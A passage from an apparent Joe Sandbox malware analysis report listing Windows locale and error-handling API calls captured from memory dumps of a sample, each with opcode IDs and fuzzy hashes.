  • Part of subcall function 024C2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024C21B9
• EnumSystemLocalesW.KERNEL32(0043B3F5,00000001,00000000,?,024C0A1C,?,024CBC89,00000000,?,?,?), ref: 024CB5A6
Memory Dump Source
• Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
Yara matches
Similarity
• API ID: ErrorLast$EnumLocalesSystem_free
• String ID:
• API String ID: 2016158738-0
• Opcode ID: ffafb835184771a8fee8a968cb960d5e6389dd898606227e18ebf87d931cb5f8
• Instruction ID: 90f12ea98e8d04160b3d421ad7a2fa3c11264305ff5f77461d81fa701db64628
• Opcode Fuzzy Hash: ffafb835184771a8fee8a968cb960d5e6389dd898606227e18ebf87d931cb5f8
• Instruction Fuzzy Hash: 1D11C63A2007055FDB189F3DC89267ABB92FF8475CB25442DD94687740D771A542CB40
APIs
  • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
  • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
  • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
• GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0043B613,00000000,00000000,?), ref: 0043B8A1
Memory Dump Source
• Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
Similarity
• API ID: ErrorLast$InfoLocale_free
• String ID:
• API String ID: 787680540-0
• Opcode ID: d4489b39268ae4454a785e185639656f72d6012a52ca4bd703596e7082c16f5e
• Instruction ID: 37b951b57323e1638715454beaabcd8ff4bbdb448c8d666509202632d17d74d0
• Opcode Fuzzy Hash: d4489b39268ae4454a785e185639656f72d6012a52ca4bd703596e7082c16f5e
• Instruction Fuzzy Hash: 72F0F932910115BFDB2C6A6588057BB776CEF44764F15542FEE05A3280EB39FE4287D8
APIs
  • Part of subcall function 024C2141: GetLastError.KERNEL32(?,?,024BA9EC,?,00000000,?,024BCDE6,0249247E,00000000,?,00451F20), ref: 024C2145
  • Part of subcall function 024C2141: _free.LIBCMT ref: 024C2178
  • Part of subcall function 024C2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024C21B9
• GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,024CB87A,00000000,00000000,?), ref: 024CBB08
Memory Dump Source
• Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
Yara matches
Similarity
• API ID: ErrorLast$InfoLocale_free
• String ID:
• API String ID: 787680540-0
• Opcode ID: 211d6faacd7aebbddaf1521eced52ad029ab4ad6bdece50ad0f57ab5ad071f03
• Instruction ID: 1115fa2ab215e34a2e4971d1695d130c9bdf8dd89431bb16d99b8b0971c6c7d2
• Opcode Fuzzy Hash: 211d6faacd7aebbddaf1521eced52ad029ab4ad6bdece50ad0f57ab5ad071f03
• Instruction Fuzzy Hash: E4F0F93AA001166BDB689A29CC46BBB7768EF4071CF24046EDD05A3644FB70BE42CAD0
APIs
  • Part of subcall function 024C2141: GetLastError.KERNEL32(?,?,024BA9EC,?,00000000,?,024BCDE6,0249247E,00000000,?,00451F20), ref: 024C2145
  • Part of subcall function 024C2141: _free.LIBCMT ref: 024C2178
  • Part of subcall function 024C2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024C21B9
  • Part of subcall function 024C2141: _free.LIBCMT ref: 024C21A0
  • Part of subcall function 024C2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024C21AD
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 024CB900
Memory Dump Source
• Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
Yara matches
Similarity
• API ID: ErrorLast$_free$InfoLocale
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2955987475-0
                                                                                                                                                                                                                                                                          • Opcode ID: d32582cdea7e1768c45f561c62b89e044e33708acaf6235ec9442aa70aeaeee6
                                                                                                                                                                                                                                                                          • Instruction ID: ffef62fb7703a98d6accad780bcbb6860a26bbd15c394bcd3c75001c5ce1da19
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d32582cdea7e1768c45f561c62b89e044e33708acaf6235ec9442aa70aeaeee6
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4D014936B511049BCB18EF38DD41ABA33A9DF04315F1441BFEE02DB281DAB55D048B50
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                                                                                                                                                                                            • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                                                                                                                                                                                                                            • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                                                                                                                                                                                          • EnumSystemLocalesW.KERNEL32(0043B645,00000001,?,?,004307B5,?,0043B9E6,004307B5,?,?,?,?,?,004307B5,?,?), ref: 0043B3B4
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2016158738-0
                                                                                                                                                                                                                                                                          • Opcode ID: ff4b281e18efaa19658e03831a8d75929bd5cd68572c305843f6b1aa6eea9166
                                                                                                                                                                                                                                                                          • Instruction ID: e409c1f6f572afb8e53c6bef185f66c51efc5fed4ad0f11af6fa15d84cefb54f
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ff4b281e18efaa19658e03831a8d75929bd5cd68572c305843f6b1aa6eea9166
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 84F022362007045FDB159F3ADC91B6A7B90EF84328F15442EFE028B680D7B5AC028684
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 024C2141: GetLastError.KERNEL32(?,?,024BA9EC,?,00000000,?,024BCDE6,0249247E,00000000,?,00451F20), ref: 024C2145
                                                                                                                                                                                                                                                                            • Part of subcall function 024C2141: _free.LIBCMT ref: 024C2178
                                                                                                                                                                                                                                                                            • Part of subcall function 024C2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024C21B9
                                                                                                                                                                                                                                                                          • EnumSystemLocalesW.KERNEL32(0043B645,00000001,?,?,024C0A1C,?,024CBC4D,024C0A1C,?,?,?,?,?,024C0A1C,?,?), ref: 024CB61B
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2016158738-0
                                                                                                                                                                                                                                                                          • Opcode ID: be0c1418a5537eaa7c8022095862ccd701d6029552e7400e1215369425bfd1f6
                                                                                                                                                                                                                                                                          • Instruction ID: 36ea6ead7d9f71a99500d584cce1c5411a3792ed85fcf48559a88f30f12426a4
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: be0c1418a5537eaa7c8022095862ccd701d6029552e7400e1215369425bfd1f6
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 47F0C23A300B055FDB246F3DDC82B7A7B95EF8076CF25442EFA458B650D7B198028A44
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,024C047A,?,00000004), ref: 024C547A
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: InfoLocale
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2299586839-0
                                                                                                                                                                                                                                                                          • Opcode ID: 07f8c7bf41114017428d2514f108cb7953daff0745a9299ad745c6acdc6e13f2
                                                                                                                                                                                                                                                                          • Instruction ID: dca8ab5af1adc2672d4bbfe0e8776cca0df0ae969c2942eae3b04f6a0a4553e0
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 07f8c7bf41114017428d2514f108cb7953daff0745a9299ad745c6acdc6e13f2
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4BF0F635680318BBDB016F55CC01F6E7B26EF04B12F50411EFC05B6290DA719920AA99
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 0042E3ED: EnterCriticalSection.KERNEL32(?,?,00431C7A,?,00457A38,00000008,00431D48,?,?,?), ref: 0042E3FC
                                                                                                                                                                                                                                                                          • EnumSystemLocalesW.KERNEL32(00434D87,00000001,00457BB8,0000000C), ref: 00434E05
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1272433827-0
                                                                                                                                                                                                                                                                          • Opcode ID: 47d67bb98ae687caab0f152daec36b922070e938420cb95d1256d2dc5184026a
                                                                                                                                                                                                                                                                          • Instruction ID: 538c22e4eb892f32bc8c86ea5e443232934619ae82977abc573478e901e73d8c
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 47d67bb98ae687caab0f152daec36b922070e938420cb95d1256d2dc5184026a
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D4F04F32A103009FE710EF69D906B9D77E1AF05726F10416AF910DB2E2CB7999808F49
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 024BE654: RtlEnterCriticalSection.NTDLL(02040DAF), ref: 024BE663
                                                                                                                                                                                                                                                                          • EnumSystemLocalesW.KERNEL32(00434D87,00000001,00457BB8,0000000C), ref: 024C506C
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1272433827-0
                                                                                                                                                                                                                                                                          • Opcode ID: 149a1b447c4ca571c705eb83a82105c6c8b5f7f3924206eb96c0dadbe136b747
                                                                                                                                                                                                                                                                          • Instruction ID: a848064e3ab137f7a738fd8805346c89e514351159180fc2dde1a190d98b60a3
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 149a1b447c4ca571c705eb83a82105c6c8b5f7f3924206eb96c0dadbe136b747
• Instruction Fuzzy Hash: B5F08732A20304DFEB10EF69D801B8C77E1AF15B21F10426AF904DB2A1CB7999448F4A

APIs
  • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
  • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
  • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
• EnumSystemLocalesW.KERNEL32(0043B1D9,00000001,?,?,?,0043BA44,004307B5,?,?,?,?,?,004307B5,?,?,?), ref: 0043B2B9
Memory Dump Source
• Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
Similarity
• API ID: ErrorLast$EnumLocalesSystem_free
• String ID:
• API String ID: 2016158738-0
• Opcode ID: d795fd725da8cf926aceeb2c3e7fa24b7794cc6b9bd948e6377232035fe4f002
• Instruction ID: ec76e124c96d5fb6d75208995366108955e3ecd697e122142a5eb02f601840fd
• Opcode Fuzzy Hash: d795fd725da8cf926aceeb2c3e7fa24b7794cc6b9bd948e6377232035fe4f002
• Instruction Fuzzy Hash: C8F0553A30020897CB089F7BE81976BBF90EFC5754F0A409EEF098B290C3399942C794

APIs
  • Part of subcall function 024C2141: GetLastError.KERNEL32(?,?,024BA9EC,?,00000000,?,024BCDE6,0249247E,00000000,?,00451F20), ref: 024C2145
  • Part of subcall function 024C2141: _free.LIBCMT ref: 024C2178
  • Part of subcall function 024C2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024C21B9
• EnumSystemLocalesW.KERNEL32(0043B1D9,00000001,?,?,?,024CBCAB,024C0A1C,?,?,?,?,?,024C0A1C,?,?,?), ref: 024CB520
Memory Dump Source
• Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
Yara matches
Similarity
• API ID: ErrorLast$EnumLocalesSystem_free
• String ID:
• API String ID: 2016158738-0
• Opcode ID: 17a3dc99c73c840853923c14692af3efa017a2bf6fb03d58d7281da58e8ea8e8
• Instruction ID: 0a90576f449ca22c4736491b66ea8d76071c4f71ddde581c8858cd95582c32da
• Opcode Fuzzy Hash: 17a3dc99c73c840853923c14692af3efa017a2bf6fb03d58d7281da58e8ea8e8
• Instruction Fuzzy Hash: A5F0553A30020857CB089F3ADC0576BBF94EFC1764B2A005EEF098B390C7719842C790

APIs
• SetUnhandledExceptionFilter.KERNEL32(Function_00010672,0040FBF9), ref: 0041066B
Memory Dump Source
• Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
• Opcode ID: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
• Instruction ID: fa39807fe97804f53db995cd18131740e6dead46809b56a5c9e59eb8483b0dbe
• Opcode Fuzzy Hash: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
• Instruction Fuzzy Hash:

APIs
• SetUnhandledExceptionFilter.KERNEL32(00410672,0249FE60), ref: 024A08D2
Memory Dump Source
• Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
Yara matches
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
• Opcode ID: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
• Instruction ID: fa39807fe97804f53db995cd18131740e6dead46809b56a5c9e59eb8483b0dbe
• Opcode Fuzzy Hash: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
• Instruction Fuzzy Hash:

APIs
Memory Dump Source
• Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
Similarity
• API ID: HeapProcess
• String ID:
• API String ID: 54951025-0
• Opcode ID: b4ea6d87a370488c09fcd641e95d7d939a449e6ed78a54530fece2258cf524d5
• Instruction ID: 646215492ee1b006629ac518ce4a11708067c45d14fae9e363609ac2be79142b
• Opcode Fuzzy Hash: b4ea6d87a370488c09fcd641e95d7d939a449e6ed78a54530fece2258cf524d5
• Instruction Fuzzy Hash: 3FA02230A00300EF8380CF30AE0830E3BE8BE03AC3B008238A002C3030EB30C0808B08

Memory Dump Source
• Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 833578221895711969fd992aca003b8dff0ac6b0b4e24d9bd8e499997b964946
• Instruction ID: 2844b30024e45351147ede59872166b67bb7d3639a7d84f230d679a3a0c0a750
• Opcode Fuzzy Hash: 833578221895711969fd992aca003b8dff0ac6b0b4e24d9bd8e499997b964946
• Instruction Fuzzy Hash: 32325761D69F014DE733A634C822336A258AFBB3D4F15E737E85AB5EA5EB2CC4834105

Memory Dump Source
• Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2dcf4a0559928c98f2b5d77cb0860f560abd3a2571bac000fbe95f0a84bb6040
• Instruction ID: d13affd36985adaba9549dda1076aa7943650852f65e7c6b0ce314185b1835a0
• Opcode Fuzzy Hash: 2dcf4a0559928c98f2b5d77cb0860f560abd3a2571bac000fbe95f0a84bb6040
• Instruction Fuzzy Hash: 88E18470A08612EFD714CF24C590AAAB7F1FF44304B54457EE846ABB81D738F862DB96

Memory Dump Source
• Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b270ae943b8fc30b0109646306f9a638257ad0854cfcd7f7143e4a79d383dfca
• Instruction ID: 0d9c5e97eb769fe52307554ece7da4665c320b79a11dbfb4ca4a059b38443d36
• Opcode Fuzzy Hash: b270ae943b8fc30b0109646306f9a638257ad0854cfcd7f7143e4a79d383dfca
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 96D1B6331085A24ADB6F4A3A84700BBFFF26E821A530D479FD4F7CA6C2EA24D555D670
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                                                                                                                                                                                          • Instruction ID: b25d7b7a8e55bbee32d2fc67e28ff16be1cfeba2f71328b5531bdb6c5bdb1bbb
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6491647230D0B34ADB294679953443FFFE15E523A135A07DFE4F2CA2C1EE289964D624
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                                                                                                                                                                                          • Instruction ID: 4834b7865edd1a94633a77e7b6be4d9b6cbc1de95510be84c880d8db3e80f095
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B69122721090A34AEB6F463E85741BFFFE55E812A530A079FD4F2CA2C5EF248555DA30
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                                                                                                                                                                                                          • Instruction ID: 19c93412fb5f9130a8e3bb0cb99d698500333008097130ff6794007c36a41420
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6591943230A0B34EEB294279943403FFFE15A523A135A07DFD4F2CA2C5EE189565E628
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                                                                                                                                                                                                          • Instruction ID: 6b294422089193adff9595540bd462b67c54910d460a54a17f1fff1e00cfa154
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 799140721090A34AEB6B467E85741BFFFE55E821A630A079FD4F2CA2C5FE24C165D630
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                                                                                                                                                                                          • Instruction ID: d2c87871af4d92e544e05363471dd483cf2102058027b34f35735ca62f395a82
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0691937230D0B34ADB2D467AA47403EFFE15A523B139A079FD4F2CB2C1ED18D6659628
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                                                                                                                                                                                          • Instruction ID: 9798d8fffb95db3bf105ee70dbcca8f3b25c487433f8b1ebdb393c604614fcd0
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 089132731090A20ADB6B463D85781BEFFE19EC11A570A079FE4F2CE2C5EE14D665D630
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 4bd5393d4189e9aa91ad74f9bcbb8c764c0ecaf8bff73b58941f35d4311e138b
                                                                                                                                                                                                                                                                          • Instruction ID: 543360d7dfb9058b4a8e0476cf2bcab449255d23345d35b398e8df16a867321f
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4bd5393d4189e9aa91ad74f9bcbb8c764c0ecaf8bff73b58941f35d4311e138b
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 856154B1F0073876DA385A2CB892BBF63849F41748FE4041BE447DB381D69DDD82865E
Memory Dump Source
• Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f064d261a6db162a18988518e6412387d7217a2fbe5ef33d199751ee8f38446f
• Instruction ID: 688709eccc1ef3f81edecbb1763f3103fff13e7f483b4a73f817d2801b0b7a58
• Opcode Fuzzy Hash: f064d261a6db162a18988518e6412387d7217a2fbe5ef33d199751ee8f38446f
• Instruction Fuzzy Hash: C1615631E00B05D6DE3B6A288890BFF63959F45A09F0408EFE886DB7C0D7159983C7B5

Memory Dump Source
• Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
• Instruction ID: 3d3f4059477c25f3e34474a921d34c240437fa272c48f742cc2d27251d9ebad1
